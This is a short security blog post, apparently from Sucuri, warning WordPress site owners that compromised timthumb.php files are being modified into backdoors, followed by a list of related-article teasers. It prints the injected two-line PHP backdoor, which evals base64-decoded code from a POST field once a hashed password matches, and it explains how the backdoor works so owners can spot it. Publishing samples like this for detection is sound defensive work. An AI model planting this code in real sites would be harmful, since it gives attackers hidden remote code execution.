TimThumb.php backdoor

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

Analysis of the Massive NDSW / NDSX Malware Campaign

Denis Sinegubko
June 2, 2022

Recently, Avast’s researchers Pavel Novák and Jan Rubín posted a detailed writeup about the “Parrot TDS” campaign involving more than 16,500 infected websites. Such massive…

Read the Post

Hooking WordPress Class to Hide Malicious Users

John Castro
January 20, 2017

When a website is compromised, attackers perform post-exploitation tasks to maintain access to the site for as long as possible. One of these actions is…

Read the Post

Seven Things You Should Monitor in WordPress Activity Logs

7 Things You Should Monitor in WordPress Activity Logs

Victor Santoyo
July 8, 2019

WordPress activity logs can be helpful when troubleshooting or trying to identify a hack. In this article, you’ll learn about the seven things you should…

Read the Post

2023 Hacked Website and Malware Threat Report

2023 Hacked Website & Malware Threat Report

Rianna MacLeod
June 12, 2024

Education is essential for defending your website against emerging threats. That’s why we are thrilled to share our 2023 Hacked Website & Malware Threat Report.…

Read the Post

Skimmer Plugin Hides Itself From wp-admin

Luke Leal
February 27, 2020

Our analyst Moe O recently discovered an interesting Javascript injection that was stealing submitted payment data from visitors on a WordPress website with a Woocommerce…

Read the Post

SQL Injection Vulnerability in Joomla! 3.7

Marc-Alexandre Montpas
May 17, 2017

During regular research audits for our Sucuri Firewall (WAF), we discovered a SQL Injection vulnerability affecting Joomla! 3.7 – CVE-2017-8917. The vulnerability is easy to exploit and…

Read the Post

Backdooring sites using exotic php functions

John Castro
February 16, 2017

Throughout the last few months, we published multiple articles about simple but powerful backdoors and how attackers get creative. Virtually in all cases, the code…

Read the Post

Soccer spam. Really?

Fernando Barbosa
September 21, 2017

In the last few months, we’ve covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from…

Read the Post

Defunct Malware Can Cause Problems Too

Harshad Mane
April 18, 2019

Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress…

Read the Post

Obfuscation Techniques in MARIJUANA Shell “Bypass”

Luke Leal
December 4, 2020

Attackers are always trying to come up with new ways to evade detection from the wide range of security controls available for web applications. This…

Read the Post

Related Tags

Related Categories

You May Also Like